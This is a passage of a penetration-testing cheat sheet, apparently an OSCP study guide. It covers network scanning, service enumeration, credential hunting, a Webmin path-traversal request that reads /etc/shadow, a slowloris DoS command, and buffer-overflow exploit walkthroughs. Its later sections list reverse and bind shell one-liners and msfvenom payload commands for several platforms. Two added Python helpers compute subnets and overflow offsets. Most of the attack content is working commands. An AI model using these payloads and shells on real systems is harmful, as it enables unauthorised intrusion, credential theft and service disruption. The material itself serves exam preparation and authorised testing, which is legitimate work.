299 | - `cd /opt; git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git `
300 |
301 | `cd /opt/recon-ng `
302 |
303 | `./recon-ng `
304 |
305 | `show modules `
306 |
307 | `help`
308 |
309 | - Active Information Gathering
310 | --------------------------------------------------------------------------------------------------------------------------
311 |
312 |
313 |
314 |
315 | - Port Scanning
316 | -----------------------------------------------------------------------------------------------------------
317 | *Subnet Reference Table*
318 |
319 | Prefix | Addresses | Hosts | Netmask | Fraction of a Class C
320 | --- | --- | --- | --- | ---
321 | /30 | 4 | 2 | 255.255.255.252| 1/64
322 | /29 | 8 | 6 | 255.255.255.248 | 1/32
323 | /28 | 16 | 14 | 255.255.255.240 | 1/16
324 | /27 | 32 | 30 | 255.255.255.224 | 1/8
325 | /26 | 64 | 62 | 255.255.255.192 | 1/4
326 | /25 | 128 | 126 | 255.255.255.128 | 1/2
327 | /24 | 256 | 254 | 255.255.255.0 | 1
328 | /23 | 512 | 510 | 255.255.254.0 | 2
329 | /22 | 1024 | 1022 | 255.255.252.0 | 4
330 | /21 | 2048 | 2046 | 255.255.248.0 | 8
331 | /20 | 4096 | 4094 | 255.255.240.0 | 16
332 | /19 | 8192 | 8190 | 255.255.224.0 | 32
333 | /18 | 16384 | 16382 | 255.255.192.0 | 64
334 | /17 | 32768 | 32766 | 255.255.128.0 | 128
335 | /16 | 65536 | 65534 | 255.255.0.0 | 256
336 |
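Every row of the Subnet Reference Table above follows from the prefix length alone. The Python below is an added example, not part of the OSCP-Survival-Guide; it computes any row with the standard library's `ipaddress` module, generalises the table to every IPv4 prefix (including the /31 and /32 edge cases the table omits), and lists the usable addresses that a target written the guide's way, such as `$ip/24`, actually covers. The CIDR used in the demo is a constructed sample value.

```python
"""Added example (not from the OSCP-Survival-Guide): compute the Subnet
Reference Table rows for any IPv4 prefix length and expand a scan target."""
import ipaddress
from fractions import Fraction


def subnet_row(prefix):
    """Return (addresses, usable hosts, netmask, fraction of a Class C) for /prefix."""
    if not 0 <= prefix <= 32:
        raise ValueError("IPv4 prefix length must be 0..32")
    addresses = 2 ** (32 - prefix)
    # /31 (RFC 3021 point-to-point) and /32 have no network/broadcast pair,
    # so every address is usable; the table above stops at /30.
    hosts = addresses - 2 if prefix <= 30 else addresses
    netmask = str(ipaddress.IPv4Network(f"0.0.0.0/{prefix}").netmask)
    class_c_fraction = Fraction(addresses, 256)  # a Class C is a /24
    return addresses, hosts, netmask, class_c_fraction


def reference_table(first=30, last=16):
    """Rebuild the page's table from /first down to /last as a list of rows."""
    return [(f"/{p}",) + subnet_row(p) for p in range(first, last - 1, -1)]


def scan_range(cidr):
    """Usable host addresses covered by a target like '192.168.1.100/24'.

    strict=False lets a host address stand in for its network, which is how
    the guide writes targets ($ip/24) for nmap and arp-scan.
    """
    net = ipaddress.IPv4Network(cidr, strict=False)
    return [str(h) for h in net.hosts()]


if __name__ == "__main__":
    print("Prefix | Addresses | Hosts | Netmask | Fraction of a Class C")
    for row in reference_table():
        print(" | ".join(str(col) for col in row))
    hosts = scan_range("192.168.1.100/28")  # constructed sample target
    print(f"192.168.1.100/28 covers {len(hosts)} hosts: {hosts[0]} .. {hosts[-1]}")
```

Knowing the expanded range before scanning is the check worth making: `$ip/24` with `ip=192.168.1.100` scans 192.168.1.1 through 192.168.1.254, 254 hosts, not just the neighbourhood of the target.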
337 | - Set the IP address as a variable
338 | `export ip=192.168.1.100 `
339 | `nmap -A -T4 -p- $ip`
340 |
341 | - Netcat port Scanning
342 | `nc -nvv -w 1 -z $ip 3388-3390`
343 |
344 | - Discover active IPs using ARP on the network:
345 | `arp-scan $ip/24`
346 |
347 | - Discover who else is on the network
348 | `netdiscover`
349 |
350 | - Discover IPs, MAC addresses and MAC vendors via ARP
351 | `netdiscover -r $ip/24`
352 |
353 | - Nmap stealth scan using SYN
354 | `nmap -sS $ip`
355 |
356 | - Nmap stealth scan using FIN
357 | `nmap -sF $ip`
358 |
359 | - Nmap Banner Grabbing
360 | `nmap -sV -sT $ip`
361 |
362 | - Nmap OS Fingerprinting
363 | `nmap -O $ip`
364 |
365 | - Nmap Regular Scan:
366 | `nmap $ip/24`
367 |
368 | - Enumeration Scan
369 | `nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt`
370 |
371 | - Enumeration Scan All Ports TCP / UDP and output to a txt file
372 | `nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip`
373 |
374 | - Nmap output to a file:
375 | `nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24`
376 |
377 | - Quick Scan:
378 | `nmap -T4 -F $ip/24`
379 |
380 | - Quick Scan Plus:
381 | `nmap -sV -T4 -O -F --version-light $ip/24`
382 |
383 | - Quick traceroute
384 | `nmap -sn --traceroute $ip`
385 |
386 | - All TCP and UDP Ports
387 | `nmap -v -sU -sS -p- -A -T4 $ip`
388 |
389 | - Intense Scan:
390 | `nmap -T4 -A -v $ip`
391 |
392 | - Intense Scan Plus UDP
393 | `nmap -sS -sU -T4 -A -v $ip/24`
394 |
395 | - Intense Scan ALL TCP Ports
396 | `nmap -p 1-65535 -T4 -A -v $ip/24`
397 |
398 | - Intense Scan - No Ping
399 | `nmap -T4 -A -v -Pn $ip/24`
400 |
401 | - Ping scan
402 | `nmap -sn $ip/24`
403 |
404 | - Slow Comprehensive Scan
405 | `nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" $ip/24`
406 |
407 | - Scan with a full TCP connect (-sT) in order to weed out any spoofed open ports designed to troll you
408 | `nmap -p1-65535 -A -T5 -sT $ip`
409 |
410 | - Enumeration
411 | -----------
412 |
413 | - DNS Enumeration
414 |
415 | - NMAP DNS Hostnames Lookup
416 | `nmap -F --dns-server `
417 |
418 | - Host Lookup
419 | `host -t ns megacorpone.com`
420 |
421 | - Reverse Lookup Brute Force - find domains in the same range
422 | `for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"`
423 |
424 | - Perform DNS IP Lookup
425 | `dig a domain-name-here.com @nameserver`
426 |
427 | - Perform MX Record Lookup
428 | `dig mx domain-name-here.com @nameserver`
429 |
430 | - Perform Zone Transfer with DIG
431 | `dig axfr domain-name-here.com @nameserver`
432 |
433 | - DNS Zone Transfers
434 | Windows DNS zone transfer
435 |
436 | `nslookup -> set type=any -> ls -d blah.com `
437 |
438 | Linux DNS zone transfer
439 |
440 | `dig axfr blah.com @ns1.blah.com`
441 |
442 | - Dnsrecon DNS Brute Force
443 | `dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml`
444 |
445 | - Dnsrecon DNS List of megacorp
446 | `dnsrecon -d megacorpone.com -t axfr`
447 |
448 | - DNSEnum
449 | `dnsenum zonetransfer.me`
450 |
451 | - NMap Enumeration Script List:
452 |
453 | - NMap Discovery
454 | [*https://nmap.org/nsedoc/categories/discovery.html*](https://nmap.org/nsedoc/categories/discovery.html)
455 |
456 | - Nmap port version detection MAXIMUM power
457 | `nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p `
458 |
459 |
460 | - NFS (Network File System) Enumeration
461 |
462 | - Show Mountable NFS Shares
463 | `nmap -sV --script=nfs-showmount $ip`
464 |
465 | - RPC (Remote Procedure Call) Enumeration
466 |
467 | - Connect to an RPC share without a username and password and enumerate privileges
468 | `rpcclient --user="" --command=enumprivs -N $ip`
469 |
470 | - Connect to an RPC share with a username and enumerate privileges
471 | `rpcclient --user="" --command=enumprivs $ip`
472 |
473 |
474 | - SMB Enumeration
475 |
476 | - SMB OS Discovery
477 | `nmap $ip --script smb-os-discovery.nse`
478 |
479 | - Nmap port scan
480 | `nmap -v -p 139,445 -oG smb.txt $ip-254`
481 |
482 | - Netbios Information Scanning
483 | `nbtscan -r $ip/24`
484 |
485 | - Nmap find exposed Netbios servers
486 | `nmap -sU --script nbstat.nse -p 137 $ip`
487 |
488 | - Nmap all SMB scripts scan
489 |
490 | `nmap -sV -Pn -vv -p 445 --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip`
491 |
492 | - Nmap all SMB scripts authenticated scan
493 |
494 | `nmap -sV -Pn -vv -p 445 --script-args smbuser=,smbpass= --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip`
495 |
496 | - SMB Enumeration Tools
497 | `nmblookup -A $ip `
498 |
499 | `smbclient //MOUNT/share -I $ip -N `
500 |
501 | `rpcclient -U "" $ip `
502 |
503 | `enum4linux $ip `
504 |
505 | `enum4linux -a $ip`
506 |
507 |
508 | - SMB Finger Printing
509 | `smbclient -L //$ip`
510 |
511 | - Nmap Scan for Open SMB Shares
512 | `nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.10.0/24`
513 |
514 | - Nmap scans for vulnerable SMB Servers
515 | `nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 $ip`
516 |
517 | - Nmap List all SMB scripts installed
518 | `ls -l /usr/share/nmap/scripts/smb*`
519 |
520 | - Enumerate SMB Users
521 |
522 | `nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14`
523 |
524 | OR
525 |
526 | `python /usr/share/doc/python-impacket-doc/examples/samrdump.py $ip`
527 |
528 |
529 | - RID Cycling - Null Sessions
530 | `ridenum.py $ip 500 50000 dict.txt`
531 |
532 | - Manual Null Session Testing
533 |
534 | Windows: `net use \\$ip\IPC$ "" /u:""`
535 |
536 | Linux: `smbclient -L //$ip`
537 |
538 |
539 | - SMTP Enumeration - Mail Servers
540 |
541 | - Verify SMTP port using Netcat
542 | `nc -nv $ip 25`
543 |
544 | - POP3 Enumeration - Reading other people's mail - You may find usernames and passwords for email accounts, so here is how to check the mail using Telnet
545 |
546 | root@kali:~# telnet $ip 110
547 | +OK beta POP3 server (JAMES POP3 Server 2.3.2) ready
548 | USER billydean
549 | +OK
550 | PASS password
551 | +OK Welcome billydean
552 |
553 | list
554 |
555 | +OK 2 1807
556 | 1 786
557 | 2 1021
558 |
559 | retr 1
560 |
561 | +OK Message follows
562 | From: jamesbrown@motown.com
563 | Dear Billy Dean,
564 |
565 | Here is your login for remote desktop ... try not to forget it this time!
566 | username: billydean
567 | password: PA$$W0RD!Z
568 |
569 |
570 | - SNMP Enumeration -Simple Network Management Protocol
571 |
572 | - Fix SNMP output values so they are human readable
573 | `apt-get install snmp-mibs-downloader download-mibs `
574 | `echo "" > /etc/snmp/snmp.conf`
575 |
576 | - SNMP Enumeration Commands
577 |
578 | - `snmpcheck -t $ip -c public`
579 |
580 | - `snmpwalk -c public -v1 $ip 1 | grep hrSWRunName | cut -d* * -f`
583 |
584 | - `snmpenum -t $ip`
585 |
586 | - `onesixtyone -c names -i hosts`
587 |
588 | - SNMPv3 Enumeration
589 | `nmap -sV -p 161 --script=snmp-info $ip/24`
590 |
591 | - Automate the username enumeration process for SNMPv3:
592 | `apt-get install snmp snmp-mibs-downloader `
593 | `wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb`
594 |
595 | - SNMP Default Credentials
596 | /usr/share/metasploit-framework/data/wordlists/snmp\_default\_pass.txt
597 |
598 |
599 | - MS SQL Server Enumeration
600 |
601 | - Nmap Information Gathering
602 |
603 | `nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip`
604 |
605 | - Webmin and miniserv/0.01 Enumeration - Port 10000
606 |
607 | Test for LFI & file disclosure vulnerability by grabbing /etc/passwd
608 |
609 | `curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd`
610 |
611 | Test to see if webmin is running as root by grabbing /etc/shadow
612 |
613 | `curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow`
614 |
615 | - Linux OS Enumeration
616 |
617 | - List all SUID files
618 | `find / -perm -4000 2>/dev/null`
619 |
620 | - Determine the current version of Linux
621 | `cat /etc/issue`
622 |
623 | - Determine more information about the environment
624 | `uname -a`
625 |
626 | - List processes running
627 | `ps -xaf`
628 |
629 | - List the allowed (and forbidden) commands for the invoking user
630 | `sudo -l`
631 |
632 | - List iptables rules
633 | `iptables --table nat --list
634 | iptables -vL -t filter
635 | iptables -vL -t nat
636 | iptables -vL -t mangle
637 | iptables -vL -t raw
638 | iptables -vL -t security`
639 |
640 | - Windows OS Enumeration
641 |
642 |
643 | - net config Workstation
644 |
645 | - systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
646 |
647 | - hostname
648 |
649 | - net users
650 |
651 | - ipconfig /all
652 |
653 | - route print
654 |
655 | - arp -A
656 |
657 | - netstat -ano
658 |
659 | - netsh firewall show state
660 |
661 | - netsh firewall show config
662 |
663 | - schtasks /query /fo LIST /v
664 |
665 | - tasklist /SVC
666 |
667 | - net start
668 |
669 | - DRIVERQUERY
670 |
671 | - reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
672 |
673 | - reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
674 |
675 | - dir /s *pass* == *cred* == *vnc* == *.config*
676 |
677 | - findstr /si password *.xml *.ini *.txt
678 |
679 | - reg query HKLM /f password /t REG_SZ /s
680 |
681 | - reg query HKCU /f password /t REG_SZ /s
682 |
683 | - Vulnerability Scanning with Nmap
684 |
685 | - Nmap Exploit Scripts
686 | [*https://nmap.org/nsedoc/categories/exploit.html*](https://nmap.org/nsedoc/categories/exploit.html)
687 |
688 | - Nmap search through vulnerability scripts
689 | `cd /usr/share/nmap/scripts/
690 | ls -l *vuln*`
691 |
692 | - Nmap search through Nmap Scripts for a specific keyword
693 | `ls /usr/share/nmap/scripts/* | grep ftp`
694 |
695 | - Scan for vulnerable exploits with nmap
696 | `nmap --script exploit -Pn $ip`
697 |
698 | - NMap Auth Scripts
699 | [*https://nmap.org/nsedoc/categories/auth.html*](https://nmap.org/nsedoc/categories/auth.html)
700 |
701 | - Nmap Vuln Scanning
702 | [*https://nmap.org/nsedoc/categories/vuln.html*](https://nmap.org/nsedoc/categories/vuln.html)
703 |
704 | - NMap DOS Scanning
705 | `nmap --script dos -Pn $ip`
706 |
707 | - NMap Execute DOS Attack
708 | `nmap --max-parallelism 750 -Pn --script http-slowloris --script-args http-slowloris.runforever=true`
709 |
710 | - Scan for coldfusion web vulnerabilities
711 | `nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip`
712 |
713 | - Anonymous FTP dump with Nmap
714 | `nmap -v -p 21 --script=ftp-anon.nse $ip-254`
715 |
716 | - SMB Security mode scan with Nmap
717 | `nmap -v -p 445 --script=smb-security-mode.nse $ip-254`
718 |
719 | - File Enumeration
720 |
721 | - Find UID 0 files root execution
722 |
723 | - `/usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null`
724 |
725 | - Get handy linux file system enumeration script (/var/tmp)
726 | `wget https://highon.coffee/downloads/linux-local-enum.sh `
727 | `chmod +x ./linux-local-enum.sh `
728 | `./linux-local-enum.sh`
729 |
730 | - Find executable files updated in August
731 | `find / -executable -type f 2> /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh | grep Aug`
732 |
733 | - Find a specific file on linux
734 | `find /. -name suid*`
735 |
736 | - Find all the strings in a file
737 | `strings `
738 |
739 | - Determine the type of a file
740 | `file `
741 |
742 | - HTTP Enumeration
743 | ----------------
744 |
745 | - Search for folders with gobuster:
746 | `gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip`
747 |
748 | - OWASP DirBuster - HTTP folder enumeration - can take a dictionary file
749 |
750 | - Dirb - Directory brute force finding using a dictionary file
751 | `dirb http://$ip/ wordlist.dict `
752 | `dirb `
753 |
754 | Dirb against a proxy
755 |
756 | - `dirb http://$ip/ -p $ip:3129`
757 |
758 | - Nikto
759 | `nikto -h $ip`
760 |
761 | - HTTP Enumeration with NMAP
762 | `nmap --script=http-enum -p80 -n $ip/24`
763 |
764 | - Nmap Check the server methods
765 | `nmap --script http-methods --script-args http-methods.url-path='/test' $ip`
766 |
767 | - Get Options available from web server
768 | `curl -vX OPTIONS vm/test`
769 |
770 | - Uniscan directory finder:
771 | `uniscan -qweds -u `
772 |
773 | - Wfuzz - The web brute forcer
774 |
775 | `wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test `
776 |
777 | `wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ `
778 |
779 | `wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ"`
780 |
781 | `wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ`
782 |
783 | Recurse level 3
784 |
785 | `wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ`
786 |
787 |
788 |
789 | - Open a service using a port knock (Secured with Knockd)
790 | `for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x server_ip_address; done`
792 |
793 | - WordPress Scan - Wordpress security scanner
794 |
795 | - wpscan --url $ip/blog --proxy $ip:3129
796 |
797 | - RSH Enumeration - Unencrypted file transfer system
798 |
799 | - auxiliary/scanner/rservices/rsh\_login
800 |
801 | - Finger Enumeration
802 |
803 | - finger @$ip
804 |
805 | - finger batman@$ip
806 |
807 | - TLS & SSL Testing
808 |
809 | - `./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U $ip | aha > OUTPUT-FILE.html`
811 |
812 | - Proxy Enumeration (useful for open proxies)
813 |
814 | - nikto -useproxy http://$ip:3128 -h $ip
815 |
816 | - Steganography
817 |
818 | - apt-get install steghide
819 |
820 | - steghide extract -sf picture.jpg
821 |
822 | - steghide info picture.jpg
823 |
824 | - apt-get install stegosuite
825 |
826 | - The OpenVAS Vulnerability Scanner
827 |
828 | - apt-get update
829 | apt-get install openvas
830 | openvas-setup
831 |
832 | - netstat -tulpn
833 |
834 | - Login at:
835 | https://$ip:9392
836 |
837 | Buffer Overflows and Exploits
838 | ===================================================================================================================================
839 |
840 | - DEP and ASLR - Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR)
842 |
843 |
844 | - Nmap Fuzzers:
845 |
846 | - NMap Fuzzer List
847 | [https://nmap.org/nsedoc/categories/fuzzer.html](https://nmap.org/nsedoc/categories/fuzzer.html)
848 |
849 | - NMap HTTP Form Fuzzer
850 | nmap --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}' -p 80 $ip
853 |
854 | - Nmap DNS Fuzzer
855 | nmap --script dns-fuzz --script-args timelimit=2h $ip -d
856 |
857 | - MSFvenom
858 | [*https://www.offensive-security.com/metasploit-unleashed/msfvenom/*](https://www.offensive-security.com/metasploit-unleashed/msfvenom/)
859 |
860 | - Windows Buffer Overflows
861 |
862 | - Controlling EIP
863 |
864 | locate pattern_create
865 | pattern_create.rb -l 2700
866 | locate pattern_offset
867 | pattern_offset.rb -q 39694438
868 |
869 | - Verify exact location of EIP - [*] Exact match at offset 2606
870 |
871 | buffer = "A" * 2606 + "B" * 4 + "C" * 90
872 |
873 | - Check for “Bad Characters” - Run multiple times 0x00 - 0xFF
874 |
875 | - Use Mona to determine a module that is unprotected
876 |
877 | - Bypass DEP if present by finding a Memory Location with Read and Execute access for JMP ESP
878 |
879 | - Use NASM to determine the HEX code for a JMP ESP instruction
880 |
881 | /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
882 |
883 | JMP ESP
884 | 00000000 FFE4 jmp esp
885 |
886 | - Run Mona in the Immunity Debugger log window to find the FFE4 (JMP ESP) opcode
887 |
888 | !mona find -s "\xff\xe4" -m slmfc.dll
889 | found at 0x5f4a358f - Flip around for little endian format
890 | buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390
891 |
892 | - MSFVenom to create payload
893 |
894 | msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
895 |
896 | - Final Payload with NOP slide
897 |
898 | buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode
899 |
900 | - Create a PE Reverse Shell
901 | msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -o shell_reverse.exe
902 |
903 | - Create a PE Reverse Shell and Encode 9 times with Shikata_ga_nai
904 | msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe
905 |
906 | - Create a PE reverse shell and embed it into an existing executable
907 | msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
908 |
909 | - Create a PE Reverse HTTPS shell
910 | msfvenom -p windows/meterpreter/reverse_https LHOST=$ip LPORT=443 -f exe -o met_https_reverse.exe
922 |
923 | - Linux Buffer Overflows
924 |
925 | - Run Evan's Debugger (edb) against an app
926 | edb --run /usr/games/crossfire/bin/crossfire
927 |
928 | - ESP register points toward the end of our CBuffer
929 | add eax,12
930 | jmp eax
931 | 83C00C add eax,byte +0xc
932 | FFE0 jmp eax
933 |
934 | - Check for “Bad Characters” - Process of elimination - Run multiple times 0x00 - 0xFF
936 |
937 | - Find JMP ESP address
938 | "\x97\x45\x13\x08" # Found at Address 08134597
939 |
940 | - crash = "\x41" * 4368 + "\x97\x45\x13\x08" + "\x83\xc0\x0c\xff\xe0\x90\x90"
941 |
942 | - msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai
945 |
946 | - Connect to the shell with netcat:
947 | nc -v $ip 4444
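Both walkthroughs above rest on two small calculations: locating the bytes that landed in EIP inside the cyclic pattern (what pattern_create.rb and pattern_offset.rb do) and writing the jump address in little-endian byte order. The Python below is an added example, not part of the original guide (function names are mine); it reproduces those steps with the values quoted above: EIP 39694438 gives offset 2606, 0x5f4a358f becomes \x8f\x35\x4a\x5f, and the Linux address 08134597 becomes \x97\x45\x13\x08.

```python
import struct
from itertools import product
from string import ascii_lowercase, ascii_uppercase, digits


def cyclic_pattern(length: int) -> bytes:
    """Metasploit-style pattern: Aa0Aa1...Aa9Ab0... (upper, lower, digit).

    Uppercase letters only ever sit at positions 0 mod 3, lowercase at 1 mod 3
    and digits at 2 mod 3, so the 4 bytes that land in EIP pin down where in
    the buffer they came from.
    """
    out = bytearray()
    for upper, lower, digit in product(ascii_uppercase, ascii_lowercase, digits):
        out += (upper + lower + digit).encode()
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(eip_hex: str, length: int = 2700) -> int:
    """Offset of the EIP value as the debugger shows it (e.g. "39694438").

    The debugger prints the register as a big-endian number, but the bytes
    were copied into memory in buffer order, so reverse them (little-endian)
    before searching. Returns -1 when the value is not in the pattern.
    """
    needle = struct.pack("<I", int(eip_hex, 16))
    return cyclic_pattern(length).find(needle)


def little_endian(address: int) -> bytes:
    """Pack a 32-bit address the way it is written into the buffer."""
    return struct.pack("<I", address)


def as_escape(raw: bytes) -> str:
    """Render bytes in the \\xNN form used by the exploit skeletons above."""
    return "".join(f"\\x{b:02x}" for b in raw)


if __name__ == "__main__":
    print(f"[*] Exact match at offset {pattern_offset('39694438')}")  # 2606
    print(as_escape(little_endian(0x5F4A358F)))  # \x8f\x35\x4a\x5f (mona hit)
    print(as_escape(little_endian(0x08134597)))  # \x97\x45\x13\x08 (Linux)
```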
948 |
949 | Shells
950 | ===================================================================================================================================
951 |
952 | - Netcat Shell Listener
953 |
954 | `nc -nlvp 4444`
955 |
956 | - Spawning a TTY Shell - Break out of Jail or limited shell
957 | You should almost always upgrade your shell after taking control of an apache or www user.
958 |
959 | (For example, when you see the error `sh: no job control in this shell` while trying to run an exploit)
960 |
961 | (hint: sudo -l to see what you can run)
962 |
963 | - You may encounter limited shells that use rbash and only allow you to execute a single command per session.
964 | You can overcome this by executing an SSH shell to your localhost:
965 |
966 | ssh user@$ip nc $localip 4444 -e /bin/sh
967 | enter user's password
968 | python -c 'import pty; pty.spawn("/bin/sh")'
969 | export TERM=linux
970 |
971 | `python -c 'import pty; pty.spawn("/bin/sh")'`
972 |
973 | `python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ip",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`
974 |
975 | `echo os.system('/bin/bash')`
976 |
977 | `/bin/sh -i`
978 |
979 | `perl -e 'exec "/bin/sh";'`
980 |
981 | perl: `exec "/bin/sh";`
982 |
983 | ruby: `exec "/bin/sh"`
984 |
985 | lua: `os.execute('/bin/sh')`
986 |
987 | From within IRB: `exec "/bin/sh"`
988 |
989 |
990 | From within vi: `:!bash`
991 | or
992 |
993 | `:set shell=/bin/bash:shell`
994 |
995 | From within vim: `:!bash`
996 |
997 | From within nmap: `!sh`
998 |
999 | From within tcpdump
1000 |
1001 | `echo $'id\n/bin/netcat $ip 443 -e /bin/bash' > /tmp/.test; chmod +x /tmp/.test; sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root`
1002 |
1003 | From busybox: `/bin/busybox telnetd -l /bin/sh -p 9999`
1004 |
1005 | - Pen test monkey PHP reverse shell
1006 | [http://pentestmonkey.net/tools/web-shells/php-reverse-shell](http://pentestmonkey.net/tools/web-shells/php-reverse-shell)
1007 |
1008 | - php-findsock-shell - turns PHP port 80 into an interactive shell
1009 | [http://pentestmonkey.net/tools/web-shells/php-findsock-shell](http://pentestmonkey.net/tools/web-shells/php-findsock-shell)
1010 |
1011 | - Perl Reverse Shell
1012 | [http://pentestmonkey.net/tools/web-shells/perl-reverse-shell](http://pentestmonkey.net/tools/web-shells/perl-reverse-shell)
1013 |
1014 | - PHP powered web browser Shell b374k with file upload etc.
1015 | [https://github.com/b374k/b374k](https://github.com/b374k/b374k)
1016 |
1017 | - Windows reverse shell - PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shell
1018 | https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1
1019 |
1020 | - Web Backdoors from Fuzzdb
1021 | https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors
1022 |
1023 | - Creating Meterpreter Shells with MSFVenom - http://www.securityunlocked.com/2016/01/02/network-security-pentesting/most-useful-msfvenom-payloads/
1024 |
1025 | *Linux*
1026 |
1027 | `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf`
1028 |
1029 | *Windows*
1030 |
1031 | `msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe`
1032 |
1033 | *Mac*
1034 |
1035 | `msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho`
1036 |
1037 | **Web Payloads**
1038 |
1039 | *PHP*
1040 |
1041 | `msfvenom -p php/reverse_php LHOST= LPORT= -f raw > shell.php`
1042 |
1043 | OR
1044 |
1045 | `msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php`
1046 |
1047 | Then we need to add the shell.php && pbpaste >> shell.php`
1050 |
1051 | *ASP*
1052 |
1053 | `msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp`
1054 |
1055 | *JSP*
1056 |
1057 | `msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp`
1058 |
1059 | *WAR*
1060 |
1061 | `msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war`
1062 |
1063 | **Scripting Payloads**
1064 |
1065 | *Python*
1066 |
1067 | `msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py`
1068 |
1069 | *Bash*
1070 |
1071 | `msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh`
1072 |
1073 | *Perl*
1074 |
1075 | `msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl`
1076 |
1077 | **Shellcode**
1078 |
1079 | For all shellcode see `msfvenom --help-formats` for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
1080 |
1081 | *Linux Based Shellcode*
1082 |
1083 | `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f `
1084 |
1085 | *Windows Based Shellcode*
1086 |
1087 | `msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f `
1088 |
1089 | *Mac Based Shellcode*
1090 |
1091 | `msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f `
1092 |
